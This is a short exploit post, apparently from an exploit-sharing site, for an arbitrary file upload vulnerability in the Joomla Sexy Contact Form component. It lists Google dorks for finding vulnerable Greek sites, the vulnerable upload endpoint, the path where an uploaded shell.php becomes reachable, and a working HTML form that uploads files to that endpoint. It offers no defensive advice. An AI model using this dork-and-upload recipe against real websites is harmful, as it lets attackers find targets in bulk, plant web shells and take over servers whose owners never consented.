facebook facebook twitter rss

Joomla Sexy contact form Arbitrary File Upload Vulnerability

Author: KkK1337 , Published: 08-11-2014
Exploit title: Joomla Sexy contact form Arbitrary File Upload Vulnerability

Author: KkK1337

Google Dork: "/components/com_sexycontactform/" site:gr

Google Dork: "Powered by sexycontact" site:gr

Google Dork: inurl:"sexy-contact-form" site:gr

Exploit : components/com_sexycontactform/fileupload/index.php

Shell Access : http://www.[target].com/components/com_sexycontactform/fileupload/files/shell.php

HTML Upload Source:

<form method="POST" action="http://localhost/components/com_sexycontactform//fileupload/index.php/"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>

Like us on Facebook :